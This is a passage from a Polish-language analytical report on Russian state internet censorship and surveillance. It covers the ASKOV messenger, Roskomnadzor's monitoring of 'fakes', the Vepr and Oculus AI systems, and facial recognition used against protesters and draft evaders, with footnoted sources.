opracowanie bezpiecznego komunikatora do komunikacji operacyjnej w strukturach
organów ścigania (MSW, FSB, Prokuratura Generalna, RosGwardia i tym podobne).
Powstała aplikacja, ASKOV, jest podobna do publicznie dostępnych komunikatorów - z
tą różnicą, że wszystkie czaty grupowe ASKOV są zorganizowane według wspólnych
zadań uczestników. (Aplikacja umożliwia również użytkownikom wymianę
bezpośrednich wiadomości). W listopadzie 2022 r. tytuły obejmowały następujące
zagadnienia:
• Nastroje protestacyjne
• Operacja destabilizacji
• Terroryzm
• Operator protestu
• Stosunki międzyetniczne
• Zagraniczna ingerencja
• Ekstremizm
Na przykład w pierwszej grupie czatów można zobaczyć szczegółowe
codzienne raporty na temat "nastrojów protestacyjnych w mediach społecznościowych",
opracowane na podstawie monitorowania 546 kont "krajowych" i 3000 kont
"regionalnych". Raporty te dotyczą kluczowych codziennych wiadomości, w tym
wszelkich publikacji "gorących przycisków" w tak zwanych "opozycyjnych" źródłach.
Raporty te mają również specjalną rubrykę dotyczącą treści, która mówi ludziom, w jaki
sposób mogą wysyłać pieniądze "do struktur opozycyjnych oraz organizacji
terrorystycznych lub ekstremistycznych". Raporty kończą się sekcją dotyczącą
planowanych spotkań protestacyjnych, z linkami do informacji o każdym proteście. Linki
są również przekazywane do Prokuratury Generalnej.
W lipcu 2022 r. ASKOV miał blisko 1000 zarejestrowanych
użytkowników, zatrudnionych w takich miejscach jak Roskomnadzor i MRFC,
41
Dokumenty pozyskane w wyniku wycieku znajdują się pod adresem
https://ddosecrets.com/wiki/Category:Russia
42
https://t.me/cpartisans/960
43
«Кабинет оперативного взаимодействия», w skrócie – АС КОВ. W przekładzie na j. polski
„Gabinet współdziałania operacyjnego”
77
Ministerstwo Spraw Wewnętrznych (MWD), RosGwardia , Prokuratura Generalna,
władze regionalne i Kancelaria Prezydenta. W systemie jest tylko jeden anonimowy
użytkownik, zarejestrowany jako "Employee Employee", który został zidentyfikowany
jako reprezentant Federalnej Służby Bezpieczeństwa. Wśród użytkowników ASKOV
znajdują się również zastępca mera Moskwy Natalia Sergunina, szef moskiewskiego
miejskiego działu IT Edward Łysenko oraz współpracownik Ramzana Kadyrowa Ahmed
Dudajew, minister publikacji drukowanych w Czeczenii
44
.
Nie powinno nas dziwić włączenie do systemu osób z władz Moskwy i
Czeczenii, zarówno stolica jak kaukaski region stanowią kluczowe elementy w systemie
bezpieczeństwa wewnętrznego federacji. W sieci pojawiły się zrzuty ekranowe systemu,
prezentuje je poniżej:
Rys. 5. Zrzut ekranu systemu ASKOV udostępniony przez grupę „Kiberpartizany”, zakładka
„Protesty”
Źródło https://t.me/cpartisans/960
44
https://meduza.io/en/feature/2023/02/10/a-wild-boar-trained-by-yandex
78
Rys. 6. Zrzut ekranu systemu ASKOV udostępniony przez grupę „Kiberpartizany”, zakładka
„Terroryzm”
Źródło https://t.me/cpartisans/960
Z powyższego zrzutu ekranu widać w jaki sposób użytkownicy są
informowani o wynikach monitoringu sieci, w tym wypadku komunikatora Telegram.
Widzimy jak pracownicy Roskomnadzoru (RKN) ręcznie monitorują media i sieci
społecznościowe. Nastepnie sporządzane są różne dzienne i miesięczne raporty.
Przykłady raportów do których dotarli dziennikarze:
• Monitorowanie faktów destabilizacji rosyjskiego społeczeństwa (codziennie i
co miesiąc)
• Raport o obecności nastrojów protestacyjnych w regionalnym segmencie sieci
społecznościowych (codziennie)
• Monitorowanie przestrzeni informacyjnej (codziennie i co miesiąc)
• Raport na temat stosunków międzyetnicznych i międzywyznaniowych (co
miesiąc)
Nie wiadomo dokładnie, w jaki sposób agencje wykorzystują te dane w
swojej pracy. Ale organy ścigania z pewnością zwracają uwagę na sekcję "informacje o
planowanych działaniach" z raportu o obecności nastrojów protestacyjnych.
Najwyraźniej lokalne prokuratury nie są powiązane z ASKOV. Jednak w swoich
raportach pracownicy Baszkirskiego oddziału Roskomnadzoru czasami informują o
wysyłaniu pewnych linków do Prokuratury Generalnej "za pośrednictwem wcześniej
zorganizowanego kanału komunikacji"
45
. To właśnie decyzje Prokuratury Generalnej
stały się ostatnio formalnym powodem ogromnej liczby blokad różnych zasobów
internetowych, które mówią o wojnie z Ukrainą z pacyfistycznego, proukraińskiego lub
po prostu neutralnego punktu widzenia, ale wbrew oficjalnej rosyjskiej propagandzie.
RKN formalnie pełnił jedynie rolę techniczną jako pośrednik między agencją nadzoru a
45
Patrz przypis 40 – w zbiorze znajdują się wycieki z baszkirskiej filii RKN.
79
operatorami telekomunikacyjnymi. Ale Roskomnadzor i jego raporty mogły być
prawdziwym inicjatorem masowej czystki mediów na początku wojny.
Wszystkie monitorowane źródła są podzielone na dwie szerokie
kategorie: propaganda i soft power. Każda kategoria jest brana pod uwagę oddzielnie przy
opracowywaniu raportu na temat "faktów destabilizacji" rosyjskiego społeczeństwa.
Pierwsza kategoria obejmuje źródła, które wykorzystują technikę "powtarzania
najprostszych i najbardziej zrozumiałych tez". Według autorów wytycznych
Roskomnadzoru, grupa ta jest obecnie "reprezentowana przez strony internetowe
głównych agencji informacyjnych lub źródeł założonych w okresie upadku ZSRR".
Zasoby z kategorii soft power specjalizują się w "leżących u podstaw zmianach w pozycji
jednostki". Są to zazwyczaj grupy w sieciach społecznościowych, strony liderów opinii,
a także media i strony internetowe, które nie naruszają bezpośrednio rosyjskiego prawa.
Każde źródło jest oznaczone w taki czy inny sposób. Pracownicy RKN
zauważają, że widzą na przykład "krytykę władz lokalnych, krytykę procesu wyborczego
(poprawki do konstytucji), krytykę opieki zdrowotnej (koronawirus)" lub "codzienną
krytykę obecnego rządu w każdym programie informacyjnym"
46
. Z analizy wycieków
wiemy, że w ciągu dwóch lat korzystania z ASKOV operatorzy wysłali ponad 44 000
raportów i materiałów dotyczących "ekstremizmu, terroryzmu i działalności
protestacyjnej" do różnych wydziałów Ministerstwa Spraw Wewnętrznych i Prokuratury
Generalnej - średnio 90 materiałów dziennie. A po rozpoczęciu wojny przekazano do
MSW materiały dotyczące 182 "liderów opinii publicznej na szczeblu federalnym i
regionalnym". W ujawnionych raportach nie udało nam się znaleźć dokładnych
informacji na temat tego, czy sprawy karne były wszczynane na podstawie "komunikacji"
między pracownikami RKN a funkcjonariuszami organów ścigania za pośrednictwem
komunikatora "Askov"
47
. Pracownicy RKN codziennie analizują posty na wszystkich
popularnych i niezablokowanych w Rosji portalach społecznościowych: VKontakte,
Odnoklassniki, YouTube, Telegram i Live Journal. Dla każdej sieci społecznościowej
tworzony jest osobny arkusz kalkulacyjny Excel, w którym umieszczane są linki do
postów (lub komentarzy do nich) i ich treści. Podczas jednej zmiany pracownik centrum
znajduje od 100 do 300 "fałszywych" wiadomości, i to nie tylko w dużych kanałach i
grupach politycznych. Na przykład publiczne czaty z publicznością mniejszą niż 20 osób
są również monitorowane przez komunikator Telegram. Jedna z tabel z "fejkami"
zebranymi w ciągu kilku dni zawierała nawet wiadomości z małego czatu dotyczącego
sprzedaży perfum i grupy zajmującej się poszukiwaniem pracy w Moskwie. W tych
tabelach "fejki" są podzielone na kategorie tematyczne, które różnią się nieznacznie w
zależności od przebiegu wojny. Oto ich lista:
• Zabijanie cywilów
• Ostrzał ludności cywilnej
• Ostrzał miast
• Straty w personelu i sprzęcie
• Jeńcy wojenni
• Grabież
• Mobilizacja
46
https://meduza.io/feature/2022/04/13/meduza-vyyasnila-chto-roskomnazdor-esche-v-2020-godu-sozdal-
sistemu-dlya-otslezhivaniya-antivoennyh-materialov-v-internete
47
https://www.currenttime.tv/a/russia-leak-internet-censorship/32262160.html
80
• Destabilizacja wewnątrz Federacji Rosyjskiej
Następnie spośród tysięcy linków ze zidentyfikowanymi "negatywnymi
informacjami o Siłach Obronnych Federacji Rosyjskiej i jej siłach zbrojnych"
wybieranych jest kilkadziesiąt, które są przesyłane do Prokuratury Generalnej za
pośrednictwem komunikatora „Askov”. Od początku wojny do listopada 2022 r.
Roskomnadzor, we współpracy z Państwowym Centrum Częstotliwości Radiowych,
zidentyfikował ponad 40 000 wiadomości z "wezwaniami do protestu przeciwko
działaniom Rosji na Ukrainie" i 160 000-170 000 materiałów z "niedokładnymi
informacjami dotyczącymi trwającej specjalnej operacji wojskowej"
48
.
Wepr, Okulus i inne
Opisany komunikator jest przykładem narzędzia analitycznego wymagającego
dużego nakładu sił do ujawnienia informacji, kolejne dwa narzędzia automatyzować
wyszukiwanie informacji. W czerwcu 2022 „Izwiestia” opublikowały artykuł
informujący o tym władze szukają firmy która wspomoże powstanie systemu
wspomagającego „moderatorów wyszukujących w sieci fejki”
49
. Według artykułu
Główne Centrum Częstotliwości Radiowych podległe Roskomnadzorowi rozpoczęło
poszukiwania twórcy systemu informatycznego, który umożliwi wyszukiwanie w
Internecie "faktów rozpowszechniania istotnych społecznie informacji pod pozorem
wiarygodnych wiadomości". Nowy system w założeniach powinien pomóc w
identyfikacji kampanii dezinformujących opinię publiczną, ocenie stopnia wpływu
„fejków
50
” na odbiorców. Systemu powinien zapewnić wczesne wykrywanie "punktów
napięcia informacyjnego" (TIN)
51
w mediach internetowych i innych zasobach
sieciowych. Przez "punkty napięcia informacyjnego" projekt rozumie "fakty
rozpowszechniania istotnych społecznie informacji pod pozorem wiarygodnych
doniesień, które stwarzają zagrożenie dla życia i (lub) zdrowia obywateli, mienia,
zagrożenie masowego zakłócenia porządku publicznego i (lub) bezpieczeństwa
publicznego". W założeniach wskazano, że algorytm powinien działać w oparciu o
matematyczne modele wyszukiwania i optymalizacji oraz metody uczenia maszynowego.
System nazwany "AS Wepr
52
" powinien obejmować zasoby o dziennej oglądalności co
najmniej 1 miliona osób i być w stanie uszeregować TIN według stopnia wpływu na
odwiedzających, ocenić możliwość przekształcenia fałszywki w zagrożenie dla
bezpieczeństwa informacji. Zadania systemu obejmują również "wykrywanie
negatywności i obelg (mowy nienawiści) wobec danego podmiotu i grupy obiektów" w
ramach określonych tematów, wykrywanie rozpowszechniania niedokładnych informacji
na te tematy, a także celowo prowadzonych kampanii informacyjnych. Głównym celem
monitoringu internetu za pomocą „Wepra” jest wykrywanie:
• „nastrojów protestacyjnych i faktów destabilizacji społecznej w związku z
48
https://www.currenttime.tv/a/russia-leak-internet-censorship/32262160.html
49
„Izwiestia” to jedno z oficjalnych mediów rosyjskich https://iz.ru/1370015/valerii-kodachigov/grafik-
robota-feiki-v-seti-po-zaprosu-vlastei-naidet-algoritm
50
„fejkami” w Rosji nazywane jest w zasadzie wszystko co nie pasuje do oficjalnej wersji przedstawianej
przez władze, w szczególności informacje dotyczące sytuacji związanej z wojną na Ukrainie.
51
„точки информационной напряженности (ТИН)”
52
https://static.istories.media/uploaded/documents/6f14a0f5e6474b81bb55585f3055ee20.pdf link do założeń
systemu, „AC Wepr” w polskim tłumaczeniu „Dzik”
81
integralnością terytorialną, konfliktami międzyetnicznymi i polityką migracyjną
• negatywnych i "fałszywych wiadomości" na temat głowy państwa, jego
czołowych postaci i samego państwa
• Manipulacja lub polaryzacja opinii publicznej (na tematy takie jak szczepienia,
niesystemowa opozycja lub sankcje)
• Profanacja lub dyskredytacja tradycyjnych wartości.
Według pierwszych planów „Wepr” miał wystartować pod koniec 2024
roku ale zgodnie z informacjami z rosyjskich mediów system „wykrywania infobomb”
testowo uruchomiono już w lutym 2023 roku
53
. Przy okazji ujawniono twórcę
oprogramowania, którym okazała się być petersburski deweloper rozwiązań IT firma
„Neobit”. Według strony internetowej firmy, która opracowuje rozwiązania
technologiczne dla Federalnej Służby Bezpieczeństwa, Ministerstwa Obrony i innych
agencji
54
. Sam Neobit, od 2021 r. jest objęty sankcjami USA
55
. Wepr będzie działał
kompleksowo z innymi systemami Roskomnadzoru w tym Oculusem. Oba systemy mają
być częścią jednolitego systemu monitorowania przestrzeni informacyjnej"
„OCLUS IS
56
” został zaprojektowany w celu zapewnienia
automatycznego wykrywania oznak naruszeń ustawodawstwa Federacji Rosyjskiej w
obrazach i materiałach wideo publikowanych w Internecie, w tym w celu ochrony dzieci
przed informacjami szkodliwymi dla ich zdrowia i/lub rozwoju, a także klasyfikacji i
identyfikacji różnych obiektów, które bezpośrednio lub pośrednio przyczyniają się do
wykrywania oznak naruszeń ustawodawstwa Federacji Rosyjskiej w obrazach i
materiałach wideo, w tym między innymi tekstu, symboli, znaków wodnych
57
. W
założeniach system indeksujący ma zbierać wiadomości z różnych źródeł, sortując je
według atrybutów zewnętrznych - tekstów, obrazów, wideo itp. Następnie „Oculus”
analizuje obrazy i filmy pod kątem zgodności, podczas gdy „Wepr” analizuje już teksty,
a także tworzy między nimi powiązania semantyczne, przewiduje dalsze
rozpowszechnianie itp. Oba systemy, miały od jesieni 2023 roku wyszukiwać i blokować
"zakazane informacje" w tekstach, zdjęciach i filmach w Internecie, wykorzystując
sztuczną inteligencję. System rozpoznawania obrazu Oculus będzie również znajdował
zdjęcia i filmy z wieców protestacyjnych i identyfikował na nich osoby. Ponadto będzie
śledzić zdjęcia Władimira Putina wykonane w photoshopie. Jedną z ważnych
funkcjonalności „Oculusa” jest zaawansowane rozpoznawanie twarzy, które jak
zobaczymy w Rosji rozwijane jest od wielu lat.
53
https://rg.ru/2023/02/20/roskomnadzor-razrabatyvaet-vepria-dlia-rabotaet-nad-sistemoj-obezvrezhivaniia-
infobomb-v-internete.html
54
https://neobit.ru/about#partners
55
„Neobit” został wpisany na listy sankcyjne w związku ze współpracą z „Huawei”
https://www.intelligenceonline.com/corporate-intelligence/2021/06/18/huawei-hired-top-researchers-from-
russia-s-us-sanctioned-neobit,109674074-eve
56
Pełna nazwa systemu brzmi „Информационная система выявления признаков нарушений
законодательства Российской Федерации в изображениях и видеоматериалах с использованием
технологий искусственного интеллекта (ИС ОКУЛУС). Litery IS w nazwie wskazują na oparcie systemu
na sztucznej inteligencji.
57
https://roskomsvoboda.org/post/grchts-dorabotka-systemy/
82
Rys. 7. Jeden ze slajdów wewnętrznej prezentacji możliwości „Oculusa” (luty 2022 r.)
opublikowany przez portal „Ważne historie”.
Źródło:https://novayagazeta.eu/articles/2023/02/08/vazhnye-istorii-rkn-planiruet-pri-pomoshchi-
iskusstvennogo-intelekta-sledit-za-manipuliatsiiami-i-poliarizatsiei-obshchestva-v-internete-news
Kiedy w lutym 2023 roku pojawiły opracowania dotyczące opisywanych
systemów, wydawało się, mamy do czynienia z ogromnym nasileniem kontroli Internetu.
Wydawało się jednak, że wdrożone zostaną tylko dwa opisane i będą współdziałać z bliżej
nieopisanym systemem indeksacji informacji „Mir”. Zakładano, że stanowią one część
systemu "Czysty Internet", nad którym prace trwają od lata 2020 roku. Zgodnie z
wcześniej ujawnionymi wewnętrznymi dokumentami, począwszy od maja 2023 r.
"Czysty Internet" miał monitorować nie tylko teksty online, ale także treści multimedialne,
wykrywając następujące kategorie naruszeń:
• Niesankcjonowane wydarzenia publiczne
• Zaangażowanie nieletnich w politykę
• Obrażanie prezydenta
• Oskarżanie prezydenta o ekstremizm
• "Fałszywki" na temat prezydenta i państwa
• "Propaganda" LGBT
Kamieniem węgielnym rosyjskiego projektu "Czysty Internet" ma być
farma botów, której pracownicy będą infiltrować zamknięte grupy mediów
społecznościowych. Zamiast publikować komentarze w mediach społecznościowych, jak
robili to wcześniej, te "boty" będą zbierać informacje, przyczyniając się do całkowitej
inwigilacji online
58
.
58
https://meduza.io/en/feature/2023/02/10/a-wild-boar-trained-by-yandex
83
We wrześniu 2023 roku dzięki kanałowi telegramowemu „Telekom
review”
59
który monitoruje między innymi system przetargowy zakupki.gov.ru
60
dowiedzieliśmy się o ogłoszonym przetargu na wiele narzędzi do kompleksowej kontroli
Internetu. Jak wynika ze specyfikacji istotnych warunków zamówienia, całościowy
system jest przeznaczony do monitorowania środków masowego przekazu i środków
masowego komunikowania , sieci informacyjnych i telekomunikacyjnych oraz
przestrzeni informacyjnej pod względem zgodności z przepisami prawa w dziedzinie
łączności, technologii informacyjnych, środków masowego komunikowania, a także
przepisami dotyczącymi danych osobowych. System składa się z następujących
podsystemów:
• System Informatyczny Monitorowania Zasobów Informacyjnych (IS MIR-1);
• Zautomatyzowany System Monitorowania Sieci Społecznościowych (AS
MASM);
• Zautomatyzowany System "Czysty Internet" (AS CI);
• Zautomatyzowane Stanowisko Pracy Eksperta (ARM Ekspert);
• Zautomatyzowany system "Gabinet Interakcji Operacyjnych" (OIC);
• Ujednolicony Moduł Analityczny (UAM);
• System informacyjny do wykrywania oznak naruszeń ustawodawstwa
Federacji Rosyjskiej w obrazach i materiałach wideo z wykorzystaniem
technologii sztucznej inteligencji (IS OKULUS);
• Zautomatyzowany system monitorowania środków masowego przekazu (AS
MSMK).
• Przedmiotem automatyzacji są procesy monitorowania mediów, środków
masowego przekazu, sieci informacyjnych i telekomunikacyjnych oraz
przestrzeni informacyjnej pod kątem zgodności z ustawodawstwem Federacji
Rosyjskiej.
• IS MIR-1 jest przeznaczony do automatycznego monitorowania zasobów
informacyjnych i identyfikacji informacji, których rozpowszechnianie w
Federacji Rosyjskiej jest ograniczone lub zabronione.
• AS MASM jest przeznaczony do wyszukiwania w czasie rzeczywistym
przypadków umieszczania zabronionych informacji, w sieciach
społecznościowych VKontakte, LiveJournal, YouTube, Odnoklassniki, My
World, Ответы@mail.ru, Likee, Dzen, Yappy i kanałach komunikatora
Telegram.
AS CI jest przeznaczony do identyfikacji stron w Internecie i sieciach
społecznościowych, które mogą potencjalnie zawierać informacje naruszające prawo
Federacji Rosyjskiej poprzez ładowanie zapytań do interfejsu wyszukiwarki. Stacja
robocza eksperta jest przeznaczona do automatyzacji procesu ekspertyzy produktów
informacyjnych, a także umożliwia automatyzację rutynowych operacji wykonywanych
przez pracowników Klienta związanych z produkcją ekspresowych i pełnych ekspertyz
naruszeń mediów, w tym badań w obszarze "pornografii dziecięcej" i "treści
59
https://t.me/Telecomreview/11102
60
Strona, jak wiele oficjalnych i rządowych portali, jest niedostępna dla użytkowników z krajów
„nieprzyjaznych” w tym oczywiście z Polski. Dlatego w artykule w większości korzystam z artykułów
prasowych i postali niezależnych.
84
samobójczych". ASKOV ma na celu zautomatyzowanie i usprawnienie interakcji
operacyjnej między służbami i agencjami federalnymi, a także ministerstwami
federalnymi, podległymi agencjami, służbami i organami nadzoru poprzez wymianę
wiadomości tekstowych za pośrednictwem Internetu. EMA ma na celu zwiększenie
szybkości wykrywania zabronionych informacji w Internecie. OCLUS IS został
zaprojektowany w celu zapewnienia automatycznego wykrywania oznak naruszeń
ustawodawstwa Federacji Rosyjskiej w obrazach i materiałach wideo publikowanych w
Internecie, w tym w celu ochrony dzieci przed informacjami szkodliwymi dla ich zdrowia
i / lub rozwoju, a także klasyfikacji i identyfikacji różnych obiektów, które bezpośrednio
lub pośrednio przyczyniają się do wykrywania oznak naruszeń ustawodawstwa Federacji
Rosyjskiej w obrazach i materiałach wideo, w tym między innymi tekstu, symboli,
znaków wodnych. AS MSMK jest przeznaczony do zbierania materiałów z witryn
medialnych z Internetu, analizowania ich pod kątem podejrzeń o naruszenia i
automatyzacji procesów przeglądu znalezionych podejrzeń, rejestrowania naruszeń,
rejestrowania podjętych środków i automatycznego raportowania
61
.
Jak widać część wymienionych systemów funkcjonuje już od jakiegoś
czasu w tym MIR i Askov od co najmniej 2020 roku. Obecny przetarg oznacza zapewne
rozwinięcie systemów już istniejących i połączenie ich z kolejnymi. Ciekawostką jest
system monitorujący sieci społecznościowe MASM. O ile rosyjskie sieci z w VKontaktie
na czele są całkowicie zależne od państwa i od dawna aktywnie cenzurują wpisy
użytkowników to poza wszelką kontrolą Kremla pozostaje, jedyny nie zablokowany
serwis zachodni, czyli Youtube. Plotki o rychłej blokadzie Youtube pojawiają się w
zasadzie od momentu inwazji na Ukrainę. Dzisiaj Youtube pełen jest rosyjskojęzycznych
kanałów opozycyjnych a sam portal jest najpopularniejszym medium społecznościowym.
Czy monitoring jest początkiem końca w Youtube w Rosji?
62
Kamery, rozpoznawanie twarzy i wszechobecny nadzór
W maju 2016 roku na stronie polskiego „Komputer Światu” pojawił się
artykuł o rosyjskiej aplikacji „Findface”
63
. Autorka tekstu opisywała aplikacje jako
przełom w poszukiwaniu informacji w Internecie. Od tej chwili wystarczyło zrobić
zdjęcie osobie a „Findface” robił za nas resztę. Aplikacja była tylko elementem większego
projektu rozpoznawania twarzy opracowanego przez firmę NtechLab
64
, która zgodnie z
informacjami zawartymi na ich stronie internetowej jest autentycznym światowym
liderem w dziedzinie rozwiązań do analizy wideo. „Nasza technologia, zbudowana w
oparciu o sztuczną inteligencję i identyfikację biometryczną, zapewnia rozpoznawanie
twarzy i sylwetek, obiektów i pojazdów, a także działań w celu rozwiązania szerokiego
zakresu zadań zarówno dla dużych i średnich przedsiębiorstw, jak i dla tworzenia
projektów na dużą skalę na poziomie miast i regionów” – zdania ze strony internetowej
są faktem. Ale zanim firma doszła do dzisiejszej pozycji, jednego z głównych technologii
rozpoznawania twarzy próbowała swoje systemy zarówno w ogólnodostępnej aplikacji
jak i we współpracy z sieciami społecznościowymi. Już po odsunięciu Pawła Durowa od
kierowania „Vkontakte” (czyli po de facto nacjonalizacji sieci społecznościowej),
61
https://roskomsvoboda.org/post/grchts-dorabotka-systemy/
62
https://www.comnews.ru/content/225501/2023-04-17/2023-w16/youtubom-edinym-rossiya-ne-zablokiruet-
globalnyy-videokhosting
63
https://www.komputerswiat.pl/aktualnosci/aplikacje/koniec-z-ukrywaniem-sie-w-sieci-findface-odnajdzie-
kazdego/mhdzhr0
64
https://ntechlab.ru
85
przeprowadzono akcję rozpoznawania osób na fotografiach w zasobach „VKontakte”,
niedługo potem przeprowadzono podobną akcję na zasobach „Odnoklassnikow”. Był to
czas gdy także „Facebook” proponował podobne ale robił to na podstawie zgody
użytkownika. Baza „Findface” była przez pewien czas dostępna za darmo i działała
bardzo dobrze. Sprawdziłem kiedyś jej użytkowanie na słabej jakości fotografiach dwóch
osób z Kazachstanu. System bardzo szybko wskazał linki do ich kont na „VKontakte”,
niepotrzebna była nawet rejestracja w samej sieci. Do dzisiaj na rosyjskich stronach
osintowych pojawiają się linki, najczęściej do botów „Telegramu”, mających dostęp do
bazy „Findface”
65
.
W 2011 roku wadze miejskie Moskwy postanowiły wdrożyć plan
rozwoju systemów wspomagających zarządzanie miastem. Jednym z takich rozwiązań
były kamery, które w początkach wdrażania projektu miały głównie wspomagać
zarządzanie transportem tak kołowym jak i metrem oraz parkingami
66
. Wiele zmieniło się
po zabójstwie w lutym 2015 roku znanego polityka opozycyjnego Borysa Niemcowa,
który został zastrzelony w pobliżu Kremla. Po marcowych demonstracjach żądających
szybkiego ustalenia sprawców zabójstwa, kamery stały się także elementem
bezpieczeństwa. Chociaż władze raczej postrzegały to bezpieczeństwo nieco inaczej. Do
2016 roku założono pokrycie terytorium Moskwy sieciami telekomunikacyjnymi 4G w
95%, i systemami zewnętrznej obserwacji wideo - 100% domów mieszkalnych. W
listopadzie tego samego roku moskiewskie place zostały wyposażone w kamery wideo.
Innowacja została natychmiast pokazana Dmitrijowi Miedwiediewowi, który jak
relacjonowano zaniepokojony faktem, że nagrania z kamer są przechowywane tylko
przez 12 dni. Kilka lat później w oficjalnym dokumencie dla ONZ władze Moskwy
mówią już o 200000 kamer dzięki którym przestępczość spadła o 60 procent
67
.
Najprawdopodobniej od 2017 roku datuje się współpraca Ntechlab z
władzami Moskwy. Sukcesywnie kamery uzyskują możliwość rozpoznawania twarzy i
śledzenia osób. System nabiera ogromnego rozpędu. W 2019 roku Departament
technologii informatycznych moskiewskiego rządu (z polskiej perspektywy byłby Urząd
Miasta) poinformował, że planuje wprowadzić okulary z funkcją rozpoznawania twarzy
dla miejskiej policji. NtechLab podobno brał udział w opracowywaniu oprogramowania
dla okularów. Inny duży program rozpoznawania twarzy, który został ogłoszony,
obejmował instalację 150 000 kamer z funkcją rozpoznawania twarzy na lotniskach i
dworcach kolejowych oraz w systemie metra w Moskwie i Petersburgu. Oczywiście
NtechLab był również zaangażowany w ten projekt
68
. G Gdy w marcu 2020 roku
wybuchła pandemia Covid 19 sprawa kamer i rozpoznawania twarzy z dnia na dzień stała
się priorytetem
69
. W dniu 10 kwietnia 2020 roku w telewizyjnym wystąpieniu mer
Moskwy Sobianin poinformował o wprowadzeniu cyfrowych przepustek
70
.
65
https://t.me/vkfindface_bot
66
https://urbanplanet.info/wp-content/uploads/2014/01/Moscow-City-for-life-ru.pdf
67
https://unece.org/fileadmin/DAM/hlm/prgm/urbandevt/Measuring_Progress__Achieving_Smarter_Cities_/Pre
sentations/Sedov.pdf
68
https://www.intellinews.com/russia-develops-a-major-face-recognition-scheme-162959/
69
https://www.hrw.org/news/2020/03/25/moscow-silently-expands-surveillance-citizens
70
https://meduza.io/video/2020/04/10/sobyanin-ob-yavil-o-vvedenii-propusknogo-rezhima-v-moskve
86
Rys. 8. Zrzut ekranu z kanału telegramu „IT Sorm” opisujący zakres danych zbieranych w procesie
wystawienia przepustki.
Źródło: kanał Telegram „IT SORM”, t.me/itsorm/1576
Z początku system spowodował straszliwy chaos, ale bardzo szybko
wprowadzono uproszczoną formę zgłaszania potrzeby wyjścia z domu czy mieszkania i
wystarczyło wysłać wiadomość tekstową na wskazany numer
71
. Aby operator systemu
zatwierdził wydanie przepustki należało podać nie tylko dane osobowe, ale także adres
zamieszkania i w przypadku wyjazdu samochodem numer rejestracyjny. W ten sposób
władze pozyskały także bazę numerów telefonów skojarzonych z adresami zamieszkania
a nie zameldowania osób oraz użytkowanym przez nich samochodami. Już jesienią 2020
roku baza wypłynęła i była wystawiona na sprzedaż. Baza miała być rozwiązaniem
czasowym ale najprawdopodobniej jest wykorzystywana do dzisiaj.
71
https://meduza.io/feature/2020/04/14/vydacha-tsifrovyh-propuskov-na-peredvizhenie-po-moskve-i-oblasti-
obernulas-haosom
87
Następnym krokiem było połączenie danych osobowych, monitoringu
telefonu komórkowego z obrazem z kamer rozpoznających twarze. System okazał się
bardzo wydajny i użyteczny. Wykorzystywano go także do prognozowania
rozprzestrzeniania się pandemii, która w Rosji miała wyjątkowo ostry przebieg. To
połączenie technologii nazwano „wielkim medbratem”, powszechnie obawiano się
cyfrowych przepustek i kontroli
72
. Mer Moskwy publicznie namawiał do skopiowania
stołecznego systemu w całym kraju, ale ostatecznie każdy region wprowadzał przepustki
samodzielnie i w trochę innym wydaniu
7374
.
W Moskwie szczególną wagę przykładano do bezpieczeństwa metra. W
kolei podziemnej wdrożono bardzo szybko automatyczny system przepustkowy wiążący
dane z telefonów komórkowych i specjalnych kart uprawniających do przejazdu z
kamerami
75
. Kolejne rozwiązanie wprowadzono w metrze w 2021 roku, otrzymało nazwę
„FacePay”. Na 240 stacjach metra osoby korzystające z systemu mogły szybciej dostać
się do pociągu bez potrzeby skanowania karty transportowej czy kupowania biletu.
Wystarczyło pokazać twarz a system jej rozpoznawania wpuszczał na peron
76
.
Rozwiązanie szczególnie przypadło do gustu młodym podróżnym. Według oficjalnych
danych do stycznia 2023 roku z systemu skorzystano 43 miliony razy
77
.
Gdy we wrześniu 2022 roku Władimir Putin ogłosił tzw. „częściową
mobilizację” początkowo nie dotyczyła ona mieszkańców Moskwy i innych wielkich
miast. Ale szybko okazało się, że masowa ucieczka potencjalnych poborowych na
prowincję i dalej za granicę wymaga uzupełnienia stanów mobilizacyjnych także o
mieszkańców stolicy. W metrze powstały czasowe komisje poborowe. Na początku
wyłapywano po prostu młodych ludzi i kierowano ich do tych punktów. Jednakże pod
koniec września, gdy wprowadzono masową rozsyłkę wezwań mobilizacyjnych
zmieniono taktykę. Kamery metra otrzymały zadanie śledzenia osób uchylających się od
służby wojskowej. Media i kanały telegramowe (patrz obraz poniżej) donosiły o
zatrzymaniach konkretnych osób na podstawie identyfikacji twarzy
78
. W podobny sposób
miejskie systemy identyfikacji twarzy wykorzystywano w trakcie protestów
antywojennych. Policja fizycznie aresztowała osoby aktywne na proteście a pozostałych
ustalano na podstawie systemu kamer
79
.
72
https://snob.ru/entry/191534/
73
https://meduza.io/feature/2020/04/27/po-vsey-rossii-vvodyat-sistemy-tsifrovyh-propuskov-my-proverili-
nekotorye-iz-nih-vmeste-s-ekspertami-po-bezopasnosti-i-vot-chto-poluchilos
74
https://blog.group-ib.ru/qr
75
https://meduza.io/feature/2020/04/18/v-moskve-vvedut-avtomaticheskuyu-sistemu-kontrolya-propuskov-
ogranicheniya-na-rabotu-predpriyatiy-prodleny-do-1-maya
76
https://www.theguardian.com/world/2021/oct/15/privacy-fears-moscow-metro-rolls-out-facial-recognition-
pay-system
77
https://www.biometricupdate.com/202301/moscow-metro-to-expand-face-pay-biometric-service-as-
customer-base-grows
78
https://www.bbc.com/russian/features-63346138
79
https://www.hrw.org/ru/news/2022/10/28/russia-uses-facial-recognition-hunt-down-draft-evaders
88
Rys. 9. Informacja kanału “Shot” na temat zatrzymania w Moskwie przy pomocy systemu
rozpoznawania twarzy, czterech osób uchylających się od poboru.
Źródło t.me/shot_shot/44341
Jak wiemy w wyniku obaw przed mobilizacją z Rosji wyjechały
dziesiątki tysięcy osób. Sporo z nich ze punktu widzenia organów władzy uchylała się od
służby wojskowej, bo pomimo wydania wezwania nie zgłosili się do komisji. Głównymi
kierunkami były Gruzja, Kazachstan, Armenia i Kirgistan. Do części z tych państw
należących do jednolitych struktur celnych Rosjanie nie potrzebowali paszportu
zagranicznego. Z prasy wiemy o przynajmniej dwóch przypadkach – stolicy Armenii i
stolicy Kirgistanu w których z pomocą władz rosyjskich wdrożono systemy
rozpoznawania twarzy. Organa policyjne tych państw otrzymały z Rosji nie tylko listy
gończe za „dezerterami’ ale także dane umożliwiające monitorowanie aktywności
poszukiwanych. Według informacji BBC Russian w obu wymienionych krajach policja
kontaktowała się z tak ustalonymi osobami, ale nikogo nie deportowano. Władze
Kazachstanu miały nie zgodzić się na takie praktyki
80
. Jak donosił kanał „Poligon media
81
”
